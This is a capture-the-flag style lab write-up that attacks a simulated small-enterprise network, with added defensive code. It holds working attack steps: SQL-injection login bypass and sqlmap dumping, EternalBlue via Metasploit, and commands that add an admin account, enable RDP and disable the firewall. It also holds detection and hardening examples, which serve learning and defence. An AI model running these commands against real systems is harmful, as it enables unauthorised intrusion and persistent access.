Two target machines, modelled as hosts of a small enterprise:
1. Server: Linux
2. Desktop: Windows
As shown in the figure:
One attacker: Kali Linux (installed by me)
According to the README, the two target machines and the attacker are first placed on 192.168.8.0/24, with the virtual network in NAT mode.
0x01 Penetration process - Server
At this point my VM setup has only one Kali box and the Server target. The following operations are performed from Kali.
First, use nmap to scan 192.168.8.0/24 and identify each host's operating system:
nmap -O 192.168.8.0/24
Result analysis: this host runs Linux, so it can be provisionally identified as the Server. Server IP: 192.168.8.2
nmap 192.168.8.2 -sV
Scan the host's ports, services and versions; the results above are obtained.
Since I'm a rookie who mainly does web, I start with port 80.
1. Port 80:
First, browse to 192.168.8.2 in the browser.
With ZAP or Burp open in passive-scan mode, manually browse every reachable page.
Under http://192.168.8.2/reports.php there is a suspicious SQL injection point.
Enter the following in the password field: 'or 1=1#
Login succeeds, which confirms the SQL injection vulnerability. For efficiency, sqlmap is used to exploit it:
sqlmap -u http://192.168.8.2/reports.php --forms
Two injection points are found (supplemented by manual testing: not only the password parameter but also the login parameter is injectable):
Find the current database and current user:
sqlmap -u http://192.168.8.2/reports.php --forms --current-db --current-user
Result: current user: company@localhost
Current database: company
Find all tables:
sqlmap -u http://192.168.8.2/reports.php --forms --tables
Dump in one step:
sqlmap -u http://192.168.8.2/reports.php --forms -D company -T users --columns --dump
This directly lists all the columns of the users table in the company database:
And the values in the table:
Enter the following command:
sqlmap -u http://192.168.8.2/reports.php --forms --os-shell
It turns out that the SQL injection cannot be used to obtain a shell.
Next, ZAP was used for active scanning, and an additional reflected XSS vulnerability was found.
Likewise, the SQL injection point also has an XSS vulnerability. As shown in the figure below, submit the POST parameters:
Nothing else turns up. Port 80 is done.
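To show why the 'or 1=1# login bypass on reports.php works and what the fix looks like, here is an added example (not the page's reports.php code, which we never see): a login check written with string concatenation next to the same check with bound parameters. SQLite stands in for the page's database, the users table and its rows are constructed, and because SQLite has no MySQL-style # comment the payloads are the comment-free and -- comment variants of the page's string.

```python
import sqlite3

# Constructed in-memory stand-in for the "users" table of the "company"
# database named on the page; the two rows are invented sample data.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    con.executemany("INSERT INTO users (login, password) VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    con.commit()
    return con

def login_vulnerable(con, login, password):
    """String concatenation: whatever the user types is parsed as SQL.
    This is the pattern sqlmap --forms was exploiting on reports.php."""
    sql = (f"SELECT login FROM users "
           f"WHERE login='{login}' AND password='{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(con, login, password):
    """Parameterised query: the same text is bound as data, never parsed as SQL."""
    sql = "SELECT login FROM users WHERE login=? AND password=?"
    row = con.execute(sql, (login, password)).fetchone()
    return row[0] if row else None

# The page typed 'or 1=1# into the password field. SQLite has no '#' comment
# token, so the password payload here closes the quote instead of commenting
# the remainder out, and the login payload uses the portable '--' comment.
PASSWORD_PAYLOAD = "' OR '1'='1"
LOGIN_PAYLOAD = "' OR '1'='1' -- "

def demo():
    """Run both payloads through both implementations."""
    con = make_db()
    return {
        # WHERE login='alice' AND password='' OR '1'='1'   -> every row matches
        "vuln_password_field": login_vulnerable(con, "alice", PASSWORD_PAYLOAD),
        # WHERE login='' OR '1'='1' -- ' AND password='x'  -> password check commented out
        "vuln_login_field": login_vulnerable(con, LOGIN_PAYLOAD, "x"),
        # Bound parameters: the payload is compared as a literal string and fails
        "hard_password_field": login_hardened(con, "alice", PASSWORD_PAYLOAD),
        "hard_login_field": login_hardened(con, LOGIN_PAYLOAD, "x"),
        "hard_real_creds": login_hardened(con, "alice", "s3cret"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable version returns the first user for both payloads, which is exactly the "successfully logged in" the page observed; the hardened version only ever returns a row for the real credentials. Storing passwords in clear text, as the dumped users table shows, is a separate defect that parameterisation does not address.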
2. Ports 139 and 445:
I've checked every hole that could be checked and tried everything that could be tried. My neck is sore. No progress; move on to the Desktop.
0x02 Penetration process - Desktop
First, use nmap to find the IP address of the Desktop host:
nmap -O 192.168.8.0/24
This confirms that the Desktop host's IP address is 192.168.8.60.
Use the following command to get more detailed information:
nmap 192.168.8.60 -A -oN Desk_nmap_A.txt
The exported Desk_nmap_A.txt is as follows:
# Nmap 7.80 scan initiated Thu Dec 17 00:46:37 2020 as: nmap -A -oN Desk_nmap_A.txt 192.168.8.60
Nmap scan report for 192.168.8.60
Host is up (0.00043s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:10:02:00 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone
Running: Microsoft Windows 2008|8.1|7|Phone|Vista
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS details: Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
Service Info: Host: WIN-USPQ65TE72P; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-USPQ65TE72P, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:10:02:00 (VMware)
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: WIN-USPQ65TE72P
|   NetBIOS computer name: WIN-USPQ65TE72P\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-16T16:46:51+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-16T16:46:51
|_  start_date: 2020-12-16T16:35:05

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.8.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 17 00:47:30 2020 -- 1 IP address (1 host up) scanned in 53.10 seconds
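The host script results above already carry the facts a defender needs before any exploit is tried: port 445 is open, the SMBv1 script got an answer, SMB1 signing is disabled and SMB2 signing is not required. As an added example (not from the page and not an nmap feature), here is a small parser for nmap's normal (-oN) output that pulls those facts out of a file such as Desk_nmap_A.txt and turns them into hardening findings. The SAMPLE input is excerpted from the scan output above; the rule that a smb-security-mode block implies SMBv1 is enabled is a heuristic, since that script negotiates SMB1.

```python
import re

# Excerpt of the Desk_nmap_A.txt output shown on the page, used as sample input.
SAMPLE = """\
Nmap scan report for 192.168.8.60
Host is up (0.00043s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
PORT445_RE = re.compile(r"^445/tcp\s+open\b")
SMB1_SIGN_RE = re.compile(r"^\|_?\s+message_signing:\s*(.+)$")   # smb-security-mode line
SMB2_SIGN_RE = re.compile(r"^\|_?\s+Message signing (.+)$")       # smb2-security-mode line

def parse_smb(text):
    """Per-host SMB facts pulled from nmap -oN text; keyed by IPv4 address."""
    hosts, cur = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = m.group(1)
            hosts[cur] = {"smb_open": False, "smb1_seen": False,
                          "smb1_signing": None, "smb2_signing": None}
            continue
        if cur is None:
            continue
        h = hosts[cur]
        if PORT445_RE.match(line):
            h["smb_open"] = True
        elif line.startswith("| smb-security-mode:"):
            # Heuristic: this script negotiates SMB1, so a reply means SMB1 is on.
            h["smb1_seen"] = True
        else:
            m1 = SMB1_SIGN_RE.match(line)
            m2 = SMB2_SIGN_RE.match(line)
            if m1:
                h["smb1_signing"] = m1.group(1).strip()
            elif m2:
                h["smb2_signing"] = m2.group(1).strip()
    return hosts

def findings(hosts):
    """Hardening findings, in a fixed order, for hosts that expose SMB."""
    out = []
    for ip, h in hosts.items():
        if not h["smb_open"]:
            continue
        if h["smb1_seen"]:
            out.append((ip, "SMBv1 still enabled (MS17-010 attack surface)"))
        if h["smb1_signing"] and h["smb1_signing"].startswith("disabled"):
            out.append((ip, "SMB1 signing disabled"))
        if h["smb2_signing"] and "not required" in h["smb2_signing"]:
            out.append((ip, "SMB2 signing not required"))
    return out

if __name__ == "__main__":
    for ip, msg in findings(parse_smb(SAMPLE)):
        print(f"{ip}: {msg}")
```

Run over a whole-subnet -oN file, this gives the list of hosts to patch (MS17-010), to disable SMBv1 on, and to enforce signing on, which is the defensive counterpart of the smb-vuln-* scan that follows.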
Port 445 is running Microsoft-DS, so run the following command:
nmap --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.8.60
CVE-2017-0143 (MS17-010) is the vulnerability most likely to be present.
Open msfconsole, use the exploit/windows/smb/ms17_010_eternalblue module, set RHOST, and run exploit.
This yields a shell. As shown in the figure:
The next step is to find a way to escalate privileges.
1. Add a new user:
net user kangel 2314838574 /add
2. Add the new user to the administrators group:
net localgroup administrators kangel /add
3. Open port 3389 for remote connection (the key path must be quoted as a whole because it contains a space):
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
4. Turn off the firewall (if it isn't turned off, the remote connection in the next step fails):
NetSh Advfirewall set allprofiles state off
5. Open a new win7 virtual machine for remote connection.
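Steps 1 to 4 are exactly the sequence a blue team should be alerting on: a brand-new local account, that account landing in Administrators minutes later, fDenyTSConnections flipped to 0, and the firewall switched off on every profile. As an added example (not from the page), here is a small correlation rule over Windows Security events. The EVENTS list is constructed, not real log data; the field names are a simplified form of the event XML (EventID 4720 = user created, 4732 = member added to a local group, 4657 = registry value modified, 4950 = firewall setting changed), and the rules assume account-management, registry-object and firewall-policy auditing are enabled on the host.

```python
from datetime import datetime, timedelta

# Constructed records modelling what the Security log would hold for steps 1-4
# above, run from the SYSTEM shell EternalBlue hands out. The first record is
# unrelated noise, included to show the rules ignore it.
EVENTS = [
    {"EventID": 4624, "TimeCreated": "2020-12-17T00:50:01",
     "SubjectUserName": "ANONYMOUS LOGON", "LogonType": 3},
    {"EventID": 4720, "TimeCreated": "2020-12-17T00:52:10",   # net user ... /add
     "SubjectUserName": "SYSTEM", "TargetUserName": "kangel"},
    {"EventID": 4732, "TimeCreated": "2020-12-17T00:52:40",   # net localgroup administrators ... /add
     "SubjectUserName": "SYSTEM", "TargetUserName": "Administrators", "MemberName": "kangel"},
    {"EventID": 4657, "TimeCreated": "2020-12-17T00:53:05",   # REG ADD ... fDenyTSConnections
     "SubjectUserName": "SYSTEM",
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Terminal Server",
     "ObjectValueName": "fDenyTSConnections", "NewValue": "0"},
    {"EventID": 4950, "TimeCreated": "2020-12-17T00:53:30",   # netsh advfirewall ... state off
     "SubjectUserName": "SYSTEM", "Profile": "Domain,Private,Public",
     "SettingType": "Enable Windows Firewall", "SettingValue": "No"},
]

WINDOW = timedelta(minutes=10)   # assumed correlation window

def _ts(e):
    return datetime.fromisoformat(e["TimeCreated"])

def detect(events):
    """Apply the three rules; returns (rule, detail, time) tuples in time order."""
    alerts, created = [], {}
    for e in sorted(events, key=_ts):
        eid = e["EventID"]
        if eid == 4720:
            created[e["TargetUserName"].lower()] = _ts(e)
        elif eid == 4732 and e.get("TargetUserName", "").lower() == "administrators":
            member = e.get("MemberName", "")
            t0 = created.get(member.lower())
            # A just-created account joining Administrators within minutes is the
            # pattern of steps 1 and 2, not of routine administration.
            if t0 is not None and _ts(e) - t0 <= WINDOW:
                alerts.append(("new_local_admin", member, e["TimeCreated"]))
        elif (eid == 4657 and e.get("ObjectValueName") == "fDenyTSConnections"
              and str(e.get("NewValue")) == "0"):
            alerts.append(("rdp_enabled_via_registry", e["ObjectName"], e["TimeCreated"]))
        elif (eid == 4950 and e.get("SettingType") == "Enable Windows Firewall"
              and e.get("SettingValue") == "No"):
            alerts.append(("firewall_disabled", e["Profile"], e["TimeCreated"]))
    return alerts

def chained(alerts, window=WINDOW):
    """True when all three rules fire inside one window: the full sequence above."""
    needed = {"new_local_admin", "rdp_enabled_via_registry", "firewall_disabled"}
    first = {}
    for rule, _, t in alerts:
        first.setdefault(rule, datetime.fromisoformat(t))
    if not needed.issubset(first):
        return False
    times = [first[r] for r in needed]
    return max(times) - min(times) <= window

if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(a)
    print("chained sequence:", chained(found))
```

Each rule is worth an alert on its own; all three inside ten minutes, with SYSTEM as the subject on a workstation, should page someone. The registry rule keys on the value name rather than the full path because audited paths show the ControlSet001 form rather than CurrentControlSet.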